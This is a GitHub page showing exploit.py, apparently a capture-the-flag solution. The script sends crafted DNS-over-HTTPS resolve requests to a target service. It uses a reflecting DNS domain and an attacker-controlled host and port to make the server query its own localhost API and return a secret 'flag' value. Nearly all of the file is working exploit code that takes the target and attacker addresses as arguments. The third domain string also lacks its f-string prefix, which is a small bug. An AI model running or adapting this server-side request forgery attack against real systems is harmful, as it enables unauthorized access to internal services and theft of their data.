-
Notifications
You must be signed in to change notification settings - Fork 2
/
exploit.py
81 lines (64 loc) · 2.1 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
#!/usr/bin/env python3
import sys
import json
import requests
# This needs to be the hostname of a DNS server that reflects
# the subdomain in its DNS response. E.g. `example.com.my-reflecting-dns.com`
# should resolve to `example.com`.
# TODO: change this to your server's hostname
REFLECTING_DNS = 'my-reflecting-dns.com'
def expect(predicate, msg):
if not predicate:
print('FAILED:', msg)
exit(1)
else:
print('PASSED:', msg)
def resolve(base_url, query):
r = requests.post(f'{base_url}/query', data=json.dumps(query), headers={'content-type':'application/json'})
return r
def exploit(base_url, attacker_host, attacker_port):
part_1_domain = f'{attacker_host}.{REFLECTING_DNS}'
part_2_domain = f'{attacker_host}.{REFLECTING_DNS}'
part_3_domain = 'localhost.{REFLECTING_DNS}'
r = resolve(base_url, {
'name': part_1_domain,
'port': attacker_port,
'useHttps': False,
'path': '/doh',
'type': 'A',
'klass': 'IN',
})
print(r.status_code)
expect(r.status_code == 200, 'resolve 1')
r = resolve(base_url, {
'name': part_2_domain,
'port': attacker_port,
'useHttps': False,
'path': '/doh',
'type': 'A',
'klass': 'IN',
})
expect(r.status_code == 200, 'resolve 2')
path = f'/api?query[]=lastAnswer:{part_1_domain}&query[]=lastAnswer:{part_2_domain}&query[]=lastAnswer:flag#'
r = resolve(base_url, {
'name': part_3_domain,
'port': 3080,
'useHttps': False,
'path': path,
'type': 'A',
'klass': 'IN',
'method': 'GET',
})
expect(r.status_code == 200, 'resolve 3')
body = json.loads(r.text)
print(''.join(chr(i) for i in body['answers'][0]['data']['data']))
def main():
if len(sys.argv) != 4:
print(f'Usage: {sys.argv[0]} <baseurl> <attacker-host> <attacker-port>')
exit(1)
base_url = sys.argv[1]
attacker_host = sys.argv[2]
attacker_port = int(sys.argv[3])
exploit(base_url, attacker_host, attacker_port)
if __name__ == '__main__':
main()